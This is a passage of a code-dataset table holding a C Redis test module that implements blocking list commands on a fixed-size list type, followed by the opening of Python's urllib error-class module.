code stringlengths 1 25.8M | language stringclasses 18 values | source stringclasses 4 values | repo stringclasses 78 values | path stringlengths 0 268 |
|---|---|---|---|---|
#include "redismodule.h"
#include <string.h>
#include <strings.h>
#include <assert.h>
#include <unistd.h>
#define UNUSED(V) ((void) V)
#define LIST_SIZE 1024
/* The FSL (Fixed-Size List) data type is a low-budget imitation of the
* native Redis list, in order to test list-like commands implemented
* by a module.
* Examples: FSL.PUSH, FSL.BPOP, etc. */
/* Fixed-size list: a bounded array plus a fill count. FSL.PUSH only accepts
 * values greater than the current last element, so entries are ascending. */
typedef struct {
    long long list[LIST_SIZE]; /* storage for up to LIST_SIZE elements */
    long long length;          /* number of valid entries in list[] */
} fsl_t; /* Fixed-size list */

/* Handle of the registered module data type; assigned in RedisModule_OnLoad. */
static RedisModuleType *fsltype = NULL;
/* Allocate a new, logically empty fixed-size list. */
fsl_t *fsl_type_create(void) {
    fsl_t *created = RedisModule_Alloc(sizeof(*created));
    created->length = 0;
    return created;
}

/* Release a list previously obtained from fsl_type_create(). */
void fsl_type_free(fsl_t *o) {
    RedisModule_Free(o);
}
/* ========================== "fsltype" type methods ======================= */
/* RDB load callback for "fsltype": reads the element count followed by that
 * many signed integers. Returns NULL (load failure) on an unknown encoding
 * version, or on a corrupt count that would overflow the fixed array —
 * previously the count was written into fsl->length unchecked, so a corrupt
 * RDB could drive the load loop past the end of list[]. */
void *fsl_rdb_load(RedisModuleIO *rdb, int encver) {
    if (encver != 0) {
        return NULL;
    }
    long long length = (long long)RedisModule_LoadUnsigned(rdb);
    if (length < 0 || length > LIST_SIZE) {
        /* Corrupt payload: refuse to load rather than write out of bounds. */
        return NULL;
    }
    fsl_t *fsl = fsl_type_create();
    fsl->length = length;
    for (long long i = 0; i < fsl->length; i++)
        fsl->list[i] = RedisModule_LoadSigned(rdb);
    return fsl;
}
/* RDB save callback: emit the element count, then each element in order. */
void fsl_rdb_save(RedisModuleIO *rdb, void *value) {
    const fsl_t *fsl = value;
    RedisModule_SaveUnsigned(rdb, fsl->length);
    for (long long idx = 0; idx < fsl->length; idx++)
        RedisModule_SaveSigned(rdb, fsl->list[idx]);
}

/* AOF-rewrite callback: rebuild the key as a sequence of FSL.PUSH commands. */
void fsl_aofrw(RedisModuleIO *aof, RedisModuleString *key, void *value) {
    const fsl_t *fsl = value;
    for (long long idx = 0; idx < fsl->length; idx++)
        RedisModule_EmitAOF(aof, "FSL.PUSH", "sl", key, fsl->list[idx]);
}

/* Value destructor registered with the module type. */
void fsl_free(void *value) {
    fsl_type_free(value);
}
/* ========================== helper methods ======================= */
/* Wrapper to the boilerplate code of opening a key, checking its type, etc.
* Returns 0 if `keyname` exists in the dataset, but it's of the wrong type (i.e. not FSL) */
/* On success returns 1 and stores the list in *fsl — or NULL when the key is
 * absent (or logically empty under WRITE) and create==0. Returns 0 only when
 * the key holds a value of a different type. Note: with create==0 and WRITE
 * mode, an empty list causes the key to be deleted, so *fsl != NULL implies
 * the list has at least one element. */
int get_fsl(RedisModuleCtx *ctx, RedisModuleString *keyname, int mode, int create, fsl_t **fsl, int reply_on_failure) {
    *fsl = NULL;
    RedisModuleKey *key = RedisModule_OpenKey(ctx, keyname, mode);
    if (RedisModule_KeyType(key) != REDISMODULE_KEYTYPE_EMPTY) {
        /* Key exists */
        if (RedisModule_ModuleTypeGetType(key) != fsltype) {
            /* Key is not FSL */
            RedisModule_CloseKey(key);
            if (reply_on_failure)
                RedisModule_ReplyWithError(ctx, REDISMODULE_ERRORMSG_WRONGTYPE);
            /* Bump a counter so the test suite can observe wrong-type accesses. */
            RedisModuleCallReply *reply = RedisModule_Call(ctx, "INCR", "c", "fsl_wrong_type");
            RedisModule_FreeCallReply(reply);
            return 0;
        }
        *fsl = RedisModule_ModuleTypeGetValue(key);
        if (*fsl && !(*fsl)->length && mode & REDISMODULE_WRITE) {
            /* Key exists, but it's logically empty */
            if (create) {
                create = 0; /* No need to create, key exists in its basic state */
            } else {
                /* Write access to a logically empty list: delete the key so
                 * the caller sees it as missing (*fsl stays NULL). */
                RedisModule_DeleteKey(key);
                *fsl = NULL;
            }
        } else {
            /* Key exists, and has elements in it - no need to create anything */
            create = 0;
        }
    }
    if (create) {
        /* Attach a fresh empty list to the previously missing key. */
        *fsl = fsl_type_create();
        RedisModule_ModuleTypeSetValue(key, fsltype, *fsl);
    }
    RedisModule_CloseKey(key);
    return 1;
}
/* ========================== commands ======================= */
/* FSL.PUSH <key> <int> - Push an integer to the fixed-size list (to the right).
* It must be greater than the element in the head of the list. */
/* FSL.PUSH <key> <int>: append an integer on the right; it must be strictly
 * greater than the current last element. Wakes any client blocked on <key>. */
int fsl_push(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    if (argc != 3)
        return RedisModule_WrongArity(ctx);

    long long value;
    if (RedisModule_StringToLongLong(argv[2], &value) != REDISMODULE_OK)
        return RedisModule_ReplyWithError(ctx, "ERR invalid integer");

    fsl_t *fsl;
    if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 1, &fsl, 1))
        return REDISMODULE_OK;

    if (fsl->length == LIST_SIZE)
        return RedisModule_ReplyWithError(ctx, "ERR list is full");
    if (fsl->length != 0 && fsl->list[fsl->length - 1] >= value)
        return RedisModule_ReplyWithError(ctx, "ERR new element has to be greater than the head element");

    fsl->list[fsl->length] = value;
    fsl->length++;

    RedisModule_SignalKeyAsReady(ctx, argv[1]);
    RedisModule_ReplicateVerbatim(ctx);
    return RedisModule_ReplyWithSimpleString(ctx, "OK");
}
/* Private data handed to the FSL.PUSHTIMER timer callback. keyname is
 * retained by the command and must be released exactly once here. */
typedef struct {
    RedisModuleString *keyname;
    long long ele;
} timer_data_t;

/* Fires once, <period> ms after FSL.PUSHTIMER: pushes td->ele if it is still
 * a legal push, then releases the private data. Fix: the original returned
 * early when the list was full or the element was not greater than the last
 * one, leaking both the retained key name and the timer_data_t. */
static void timer_callback(RedisModuleCtx *ctx, void *data)
{
    timer_data_t *td = data;
    fsl_t *fsl;
    if (get_fsl(ctx, td->keyname, REDISMODULE_WRITE, 1, &fsl, 1)) {
        if (fsl->length < LIST_SIZE &&
            (fsl->length == 0 || fsl->list[fsl->length-1] < td->ele)) {
            fsl->list[fsl->length++] = td->ele;
            RedisModule_SignalKeyAsReady(ctx, td->keyname);
            /* Timer events don't propagate automatically; replicate an
             * equivalent command explicitly. */
            RedisModule_Replicate(ctx, "FSL.PUSH", "sl", td->keyname, td->ele);
        }
    }
    /* Release the private data on every path. */
    RedisModule_FreeString(ctx, td->keyname);
    RedisModule_Free(td);
}
/* FSL.PUSHTIMER <key> <int> <period-in-ms> - After <period-in-ms>, push <int> to the fixed-size list (to the right).
 * It must be greater than the element in the head of the list. */
/* Schedule a one-shot timer that pushes <int> onto <key> after the given
 * period; replies with the timer id. */
int fsl_pushtimer(RedisModuleCtx *ctx, RedisModuleString **argv, int argc)
{
    if (argc != 4)
        return RedisModule_WrongArity(ctx);

    long long value, period_ms;
    if (RedisModule_StringToLongLong(argv[2], &value) != REDISMODULE_OK)
        return RedisModule_ReplyWithError(ctx, "ERR invalid integer");
    if (RedisModule_StringToLongLong(argv[3], &period_ms) != REDISMODULE_OK)
        return RedisModule_ReplyWithError(ctx, "ERR invalid period");

    fsl_t *fsl;
    if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 1, &fsl, 1))
        return REDISMODULE_OK;
    if (fsl->length == LIST_SIZE)
        return RedisModule_ReplyWithError(ctx, "ERR list is full");

    /* The timer callback owns td (and the retained key name) from here on. */
    timer_data_t *td = RedisModule_Alloc(sizeof(*td));
    td->keyname = argv[1];
    RedisModule_RetainString(ctx, td->keyname);
    td->ele = value;

    RedisModuleTimerID id = RedisModule_CreateTimer(ctx, period_ms, timer_callback, td);
    RedisModule_ReplyWithLongLong(ctx, id);
    return REDISMODULE_OK;
}
/* Reply callback invoked when a blocked FSL.BPOP client's key becomes ready:
 * pops the last element and replies with it. Returning REDISMODULE_ERR tells
 * the core the callback could not serve the client, so it stays blocked
 * (per the RedisModule_BlockClientOnKeys contract). */
int bpop_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    RedisModuleString *keyname = RedisModule_GetBlockedClientReadyKey(ctx);
    fsl_t *fsl;
    if (!get_fsl(ctx, keyname, REDISMODULE_WRITE, 0, &fsl, 0) || !fsl)
        return REDISMODULE_ERR;
    /* get_fsl(create=0, WRITE) never yields an empty list (it deletes it). */
    RedisModule_Assert(fsl->length);
    RedisModule_ReplyWithLongLong(ctx, fsl->list[--fsl->length]);
    /* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
    RedisModule_ReplicateVerbatim(ctx);
    return REDISMODULE_OK;
}

/* Timeout callback for FSL.BPOP: reached when no push arrives in time. */
int bpop_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    return RedisModule_ReplyWithSimpleString(ctx, "Request timedout");
}
/* FSL.BPOP <key> <timeout> [NO_TO_CB] - Block clients until the list has an element.
 * When that happens, unblock the client and pop the last element (from the right). */
int fsl_bpop(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    if (argc < 3)
        return RedisModule_WrongArity(ctx);

    long long timeout;
    if (RedisModule_StringToLongLong(argv[2],&timeout) != REDISMODULE_OK || timeout < 0)
        return RedisModule_ReplyWithError(ctx,"ERR invalid timeout");

    /* Optional NO_TO_CB argument: block without installing a timeout callback. */
    int to_cb = 1;
    if (argc == 4) {
        if (strcasecmp("NO_TO_CB", RedisModule_StringPtrLen(argv[3], NULL)))
            return RedisModule_ReplyWithError(ctx,"ERR invalid argument");
        to_cb = 0;
    }

    fsl_t *fsl;
    if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 0, &fsl, 1))
        return REDISMODULE_OK;

    if (!fsl) {
        /* Nothing to pop yet: block until FSL.PUSH signals the key. */
        RedisModule_BlockClientOnKeys(ctx, bpop_reply_callback, to_cb ? bpop_timeout_callback : NULL,
                                      NULL, timeout, &argv[1], 1, NULL);
    } else {
        /* Element available: serve the pop inline. */
        RedisModule_Assert(fsl->length);
        RedisModule_ReplyWithLongLong(ctx, fsl->list[--fsl->length]);
        /* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
        RedisModule_ReplicateVerbatim(ctx);
    }
    return REDISMODULE_OK;
}
/* Reply callback for FSL.BPOPGT: pop the last element only if it exceeds the
 * gt threshold carried in the blocked client's private data. */
int bpopgt_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    RedisModuleString *keyname = RedisModule_GetBlockedClientReadyKey(ctx);
    long long *pgt = RedisModule_GetBlockedClientPrivateData(ctx);
    fsl_t *fsl;
    if (!get_fsl(ctx, keyname, REDISMODULE_WRITE, 0, &fsl, 0) || !fsl)
        return RedisModule_ReplyWithError(ctx,"UNBLOCKED key no longer exists");
    /* NOTE(review): list[length-1] is read before the length assert below;
     * this relies on get_fsl(create=0, WRITE) never returning an empty list. */
    if (fsl->list[fsl->length-1] <= *pgt)
        return REDISMODULE_ERR; /* not big enough yet: stay blocked */
    RedisModule_Assert(fsl->length);
    RedisModule_ReplyWithLongLong(ctx, fsl->list[--fsl->length]);
    /* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
    RedisModule_ReplicateVerbatim(ctx);
    return REDISMODULE_OK;
}

/* Timeout callback for FSL.BPOPGT. */
int bpopgt_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    return RedisModule_ReplyWithSimpleString(ctx, "Request timedout");
}

/* Free callback for the heap-allocated gt threshold (see fsl_bpopgt). */
void bpopgt_free_privdata(RedisModuleCtx *ctx, void *privdata) {
    REDISMODULE_NOT_USED(ctx);
    RedisModule_Free(privdata);
}
/* FSL.BPOPGT <key> <gt> <timeout> - Block clients until list has an element greater than <gt>.
* When that happens, unblock client and pop the last element (from the right). */
/* Parses <gt> and <timeout>, then either pops inline (last element > gt) or
 * blocks with the threshold stashed as private data. Fix: the <gt> parse
 * line contained a mangled "&gt" (rendered as a bare ">"), which does not
 * compile; the address-of argument is restored here. */
int fsl_bpopgt(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    if (argc != 4)
        return RedisModule_WrongArity(ctx);

    long long gt;
    if (RedisModule_StringToLongLong(argv[2], &gt) != REDISMODULE_OK)
        return RedisModule_ReplyWithError(ctx, "ERR invalid integer");

    long long timeout;
    if (RedisModule_StringToLongLong(argv[3], &timeout) != REDISMODULE_OK || timeout < 0)
        return RedisModule_ReplyWithError(ctx, "ERR invalid timeout");

    fsl_t *fsl;
    if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 0, &fsl, 1))
        return REDISMODULE_OK;
    if (!fsl)
        return RedisModule_ReplyWithError(ctx, "ERR key must exist");

    if (fsl->list[fsl->length-1] <= gt) {
        /* We use malloc so the tests in blockedonkeys.tcl can check for memory leaks */
        long long *pgt = RedisModule_Alloc(sizeof(long long));
        *pgt = gt;
        RedisModule_BlockClientOnKeysWithFlags(
            ctx, bpopgt_reply_callback, bpopgt_timeout_callback,
            bpopgt_free_privdata, timeout, &argv[1], 1, pgt,
            REDISMODULE_BLOCK_UNBLOCK_DELETED);
    } else {
        RedisModule_Assert(fsl->length);
        RedisModule_ReplyWithLongLong(ctx, fsl->list[--fsl->length]);
        /* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
        RedisModule_ReplicateVerbatim(ctx);
    }
    return REDISMODULE_OK;
}
/* Reply callback for FSL.BPOPPUSH: pop from the ready source key and append
 * to the destination key named by the private data. Returning
 * REDISMODULE_ERR keeps the client blocked. */
int bpoppush_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    RedisModuleString *src_keyname = RedisModule_GetBlockedClientReadyKey(ctx);
    RedisModuleString *dst_keyname = RedisModule_GetBlockedClientPrivateData(ctx);
    fsl_t *src;
    if (!get_fsl(ctx, src_keyname, REDISMODULE_WRITE, 0, &src, 0) || !src)
        return REDISMODULE_ERR;
    fsl_t *dst;
    if (!get_fsl(ctx, dst_keyname, REDISMODULE_WRITE, 1, &dst, 0) || !dst)
        return REDISMODULE_ERR;
    RedisModule_Assert(src->length);
    long long ele = src->list[--src->length];
    /* NOTE(review): dst capacity is not checked before this append;
     * presumably the test suite never fills the destination. TODO confirm. */
    dst->list[dst->length++] = ele;
    RedisModule_SignalKeyAsReady(ctx, dst_keyname);
    /* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
    RedisModule_ReplicateVerbatim(ctx);
    return RedisModule_ReplyWithLongLong(ctx, ele);
}

/* Timeout callback for FSL.BPOPPUSH. */
int bpoppush_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    return RedisModule_ReplyWithSimpleString(ctx, "Request timedout");
}

/* Free callback: releases the retained destination key name. */
void bpoppush_free_privdata(RedisModuleCtx *ctx, void *privdata) {
    RedisModule_FreeString(ctx, privdata);
}
/* FSL.BPOPPUSH <src> <dst> <timeout> - Block clients until <src> has an element.
* When that happens, unblock client, pop the last element from <src> and push it to <dst>
* (from the right). */
/* Moves the last element of <src> to the end of <dst>, blocking if <src> is
 * empty. The destination key name travels to the reply callback as privdata. */
int fsl_bpoppush(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    if (argc != 4)
        return RedisModule_WrongArity(ctx);
    long long timeout;
    if (RedisModule_StringToLongLong(argv[3],&timeout) != REDISMODULE_OK || timeout < 0)
        return RedisModule_ReplyWithError(ctx,"ERR invalid timeout");
    fsl_t *src;
    if (!get_fsl(ctx, argv[1], REDISMODULE_WRITE, 0, &src, 1))
        return REDISMODULE_OK;
    if (!src) {
        /* Retain string for reply callback */
        RedisModule_RetainString(ctx, argv[2]);
        /* Key is empty, we must block */
        RedisModule_BlockClientOnKeys(ctx, bpoppush_reply_callback, bpoppush_timeout_callback,
                                      bpoppush_free_privdata, timeout, &argv[1], 1, argv[2]);
    } else {
        /* Source has an element: do the transfer inline. */
        fsl_t *dst;
        if (!get_fsl(ctx, argv[2], REDISMODULE_WRITE, 1, &dst, 1))
            return REDISMODULE_OK;
        RedisModule_Assert(src->length);
        long long ele = src->list[--src->length];
        /* NOTE(review): dst capacity is not checked before this append;
         * presumably the test suite never fills the destination. */
        dst->list[dst->length++] = ele;
        RedisModule_SignalKeyAsReady(ctx, argv[2]);
        RedisModule_ReplyWithLongLong(ctx, ele);
        /* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
        RedisModule_ReplicateVerbatim(ctx);
    }
    return REDISMODULE_OK;
}
/* FSL.GETALL <key> - Reply with an array containing all elements. */
int fsl_getall(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
if (argc != 2)
return RedisModule_WrongArity(ctx);
fsl_t *fsl;
if (!get_fsl(ctx, argv[1], REDISMODULE_READ, 0, &fsl, 1))
return REDISMODULE_OK;
if (!fsl)
return RedisModule_ReplyWithArray(ctx, 0);
RedisModule_ReplyWithArray(ctx, fsl->length);
for (int i = 0; i < fsl->length; i++)
RedisModule_ReplyWithLongLong(ctx, fsl->list[i]);
return REDISMODULE_OK;
}
/* Callback for blockonkeys_popall */
/* Reply callback for BLOCKONKEYS.POPALL: drain the (native) list key and
 * reply with every element. The array length is postponed because it is not
 * known until the list is exhausted. */
int blockonkeys_popall_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argc);
    RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_WRITE);
    if (RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_LIST) {
        RedisModuleString *elem;
        long len = 0;
        RedisModule_ReplyWithArray(ctx, REDISMODULE_POSTPONED_ARRAY_LEN);
        while ((elem = RedisModule_ListPop(key, REDISMODULE_LIST_HEAD)) != NULL) {
            len++;
            RedisModule_ReplyWithString(ctx, elem);
            RedisModule_FreeString(ctx, elem);
        }
        /* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
        RedisModule_ReplicateVerbatim(ctx);
        RedisModule_ReplySetArrayLength(ctx, len);
    } else {
        RedisModule_ReplyWithError(ctx, "ERR Not a list");
    }
    RedisModule_CloseKey(key);
    return REDISMODULE_OK;
}

/* Timeout callback for BLOCKONKEYS.POPALL. */
int blockonkeys_popall_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    return RedisModule_ReplyWithError(ctx, "ERR Timeout");
}
/* BLOCKONKEYS.POPALL key
*
* Blocks on an empty key for up to 3 seconds. When unblocked by a list
* operation like LPUSH, all the elements are popped and returned. Fails with an
* error on timeout. */
int blockonkeys_popall(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    if (argc != 2)
        return RedisModule_WrongArity(ctx);
    RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_READ);
    if (RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_EMPTY) {
        /* Fixed 3-second timeout; a list write (e.g. LPUSH) unblocks the
         * client, which then pops and returns everything. */
        RedisModule_BlockClientOnKeys(ctx, blockonkeys_popall_reply_callback,
                                      blockonkeys_popall_timeout_callback,
                                      NULL, 3000, &argv[1], 1, NULL);
    } else {
        RedisModule_ReplyWithError(ctx, "ERR Key not empty");
    }
    RedisModule_CloseKey(key);
    return REDISMODULE_OK;
}
/* BLOCKONKEYS.LPUSH key val [val ..]
* BLOCKONKEYS.LPUSH_UNBLOCK key val [val ..]
*
* A module equivalent of LPUSH. If the name LPUSH_UNBLOCK is used,
* RM_SignalKeyAsReady() is also called. */
/* Module equivalent of LPUSH; the LPUSH_UNBLOCK spelling additionally calls
 * RM_SignalKeyAsReady(). Two fixes:
 * 1. The wrong-type branch used to fall through and also reply "OK" (a
 *    second reply) and replicate the failed command; it now returns early.
 * 2. strncasecmp(str, "blockonkeys.lpush_unblock", len) with len ==
 *    strlen(str) is a prefix test, so plain "blockonkeys.lpush" (whose 17
 *    characters all match) would also signal; compare exactly instead. */
int blockonkeys_lpush(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    if (argc < 3)
        return RedisModule_WrongArity(ctx);

    RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_WRITE);
    if (RedisModule_KeyType(key) != REDISMODULE_KEYTYPE_EMPTY &&
        RedisModule_KeyType(key) != REDISMODULE_KEYTYPE_LIST) {
        RedisModule_CloseKey(key);
        return RedisModule_ReplyWithError(ctx, REDISMODULE_ERRORMSG_WRONGTYPE);
    }
    for (int i = 2; i < argc; i++) {
        if (RedisModule_ListPush(key, REDISMODULE_LIST_HEAD,
                                 argv[i]) != REDISMODULE_OK) {
            RedisModule_CloseKey(key);
            return RedisModule_ReplyWithError(ctx, "ERR Push failed");
        }
    }
    RedisModule_CloseKey(key);

    /* signal key as ready only when invoked as the lpush_unblock command */
    const char *str = RedisModule_StringPtrLen(argv[0], NULL);
    if (!strcasecmp(str, "blockonkeys.lpush_unblock")) {
        RedisModule_SignalKeyAsReady(ctx, argv[1]);
    }
    RedisModule_ReplicateVerbatim(ctx);
    return RedisModule_ReplyWithSimpleString(ctx, "OK");
}
/* Callback for the BLOCKONKEYS.BLPOPN command */
/* Reply callback for BLOCKONKEYS.BLPOPN: pops N elements once the list holds
 * at least N. Returning REDISMODULE_ERR keeps the client blocked; the
 * "blpopn_or_unblock" variant instead force-unblocks the client when the
 * list is still too short. */
int blockonkeys_blpopn_reply_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argc);
    long long n;
    RedisModule_StringToLongLong(argv[2], &n); /* already validated by the command */
    RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_WRITE);
    int result;
    if (RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_LIST &&
        RedisModule_ValueLength(key) >= (size_t)n) {
        RedisModule_ReplyWithArray(ctx, n);
        for (long i = 0; i < n; i++) {
            RedisModuleString *elem = RedisModule_ListPop(key, REDISMODULE_LIST_HEAD);
            RedisModule_ReplyWithString(ctx, elem);
            RedisModule_FreeString(ctx, elem);
        }
        /* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
        RedisModule_ReplicateVerbatim(ctx);
        result = REDISMODULE_OK;
    } else if (RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_LIST ||
               RedisModule_KeyType(key) == REDISMODULE_KEYTYPE_EMPTY) {
        const char *module_cmd = RedisModule_StringPtrLen(argv[0], NULL);
        if (!strcasecmp(module_cmd, "blockonkeys.blpopn_or_unblock"))
            RedisModule_UnblockClient(RedisModule_GetBlockedClientHandle(ctx), NULL);
        /* continue blocking */
        result = REDISMODULE_ERR;
    } else {
        result = RedisModule_ReplyWithError(ctx, REDISMODULE_ERRORMSG_WRONGTYPE);
    }
    RedisModule_CloseKey(key);
    return result;
}

/* Timeout callback (used when timeout != 0). */
int blockonkeys_blpopn_timeout_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    return RedisModule_ReplyWithError(ctx, "ERR Timeout");
}

/* Abort callback (installed instead of the timeout callback when timeout == 0). */
int blockonkeys_blpopn_abort_callback(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);
    return RedisModule_ReplyWithSimpleString(ctx, "Action aborted");
}
/* BLOCKONKEYS.BLPOPN key N
*
* Blocks until key has N elements and then pops them or fails after 3 seconds.
*/
/* BLOCKONKEYS.BLPOPN key N [timeout-ms]: pop N elements at once, blocking
 * until the list holds at least N. The timeout defaults to 3000 ms; a
 * timeout of 0 installs the abort callback instead of the timeout callback. */
int blockonkeys_blpopn(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    if (argc < 3) return RedisModule_WrongArity(ctx);
    long long n, timeout = 3000LL;
    if (RedisModule_StringToLongLong(argv[2], &n) != REDISMODULE_OK) {
        return RedisModule_ReplyWithError(ctx, "ERR Invalid N");
    }
    if (argc > 3 ) {
        if (RedisModule_StringToLongLong(argv[3], &timeout) != REDISMODULE_OK) {
            return RedisModule_ReplyWithError(ctx, "ERR Invalid timeout value");
        }
    }
    RedisModuleKey *key = RedisModule_OpenKey(ctx, argv[1], REDISMODULE_WRITE);
    int keytype = RedisModule_KeyType(key);
    if (keytype != REDISMODULE_KEYTYPE_EMPTY &&
        keytype != REDISMODULE_KEYTYPE_LIST) {
        RedisModule_ReplyWithError(ctx, REDISMODULE_ERRORMSG_WRONGTYPE);
    } else if (keytype == REDISMODULE_KEYTYPE_LIST &&
               RedisModule_ValueLength(key) >= (size_t)n) {
        /* Enough elements already: serve the pop inline without blocking. */
        RedisModule_ReplyWithArray(ctx, n);
        for (long i = 0; i < n; i++) {
            RedisModuleString *elem = RedisModule_ListPop(key, REDISMODULE_LIST_HEAD);
            RedisModule_ReplyWithString(ctx, elem);
            RedisModule_FreeString(ctx, elem);
        }
        /* I'm lazy so i'll replicate a potentially blocking command, it shouldn't block in this flow. */
        RedisModule_ReplicateVerbatim(ctx);
    } else {
        RedisModule_BlockClientOnKeys(ctx, blockonkeys_blpopn_reply_callback,
                                      timeout ? blockonkeys_blpopn_timeout_callback : blockonkeys_blpopn_abort_callback,
                                      NULL, timeout, &argv[1], 1, NULL);
    }
    RedisModule_CloseKey(key);
    return REDISMODULE_OK;
}
/* Module entry point: registers the "fsltype" data type and all of the
 * FSL.* / BLOCKONKEYS.* commands used by the list blocking tests.
 * Fix: the closing-brace line carried stray non-C metadata text
 * ("| c | github | ..."), which breaks compilation; it is removed here. */
int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
    REDISMODULE_NOT_USED(argv);
    REDISMODULE_NOT_USED(argc);

    if (RedisModule_Init(ctx, "blockonkeys", 1, REDISMODULE_APIVER_1)== REDISMODULE_ERR)
        return REDISMODULE_ERR;

    RedisModuleTypeMethods tm = {
        .version = REDISMODULE_TYPE_METHOD_VERSION,
        .rdb_load = fsl_rdb_load,
        .rdb_save = fsl_rdb_save,
        .aof_rewrite = fsl_aofrw,
        .mem_usage = NULL,
        .free = fsl_free,
        .digest = NULL,
    };

    fsltype = RedisModule_CreateDataType(ctx, "fsltype_t", 0, &tm);
    if (fsltype == NULL)
        return REDISMODULE_ERR;

    if (RedisModule_CreateCommand(ctx,"fsl.push",fsl_push,"write",1,1,1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx,"fsl.pushtimer",fsl_pushtimer,"write",1,1,1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx,"fsl.bpop",fsl_bpop,"write",1,1,1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx,"fsl.bpopgt",fsl_bpopgt,"write",1,1,1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    /* BPOPPUSH touches two keys, hence lastkey == 2. */
    if (RedisModule_CreateCommand(ctx,"fsl.bpoppush",fsl_bpoppush,"write",1,2,1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx,"fsl.getall",fsl_getall,"",1,1,1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx, "blockonkeys.popall", blockonkeys_popall,
                                  "write", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    /* Both LPUSH spellings route to the same handler, which inspects argv[0]. */
    if (RedisModule_CreateCommand(ctx, "blockonkeys.lpush", blockonkeys_lpush,
                                  "write", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx, "blockonkeys.lpush_unblock", blockonkeys_lpush,
                                  "write", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx, "blockonkeys.blpopn", blockonkeys_blpopn,
                                  "write", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx, "blockonkeys.blpopn_or_unblock", blockonkeys_blpopn,
                                  "write", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    return REDISMODULE_OK;
}
"""Exception classes raised by urllib.
The base exception class is URLError, which inherits from OSError. It
doesn't define any behavior of its own, but is the base class for all
exceptions defined in this package.
HTTPError is an exception class that is also a valid HTTP response
instance. It behaves this way because HTTP protocol errors are valid
responses, with a status code, headers, and a body. In some contexts,
an application may want to handle an exception like a regular
response.
"""
import io
import urllib.response
__all__ = ['URLError', 'HTTPError', 'ContentTooShortError']
class URLError(OSError):
    """Base urllib exception: wraps a reason and an optional filename.

    Subclasses OSError but shares none of its implementation; self.args is
    populated for OSError compatibility, although it does not follow the
    usual (errno, strerror) layout.
    """

    def __init__(self, reason, filename=None):
        self.args = (reason,)
        self.reason = reason
        if filename is not None:
            self.filename = filename

    def __str__(self):
        return '<urlopen error %s>' % self.reason
class HTTPError(URLError, urllib.response.addinfourl):
    """Raised when HTTP error occurs, but also acts like non-error return"""

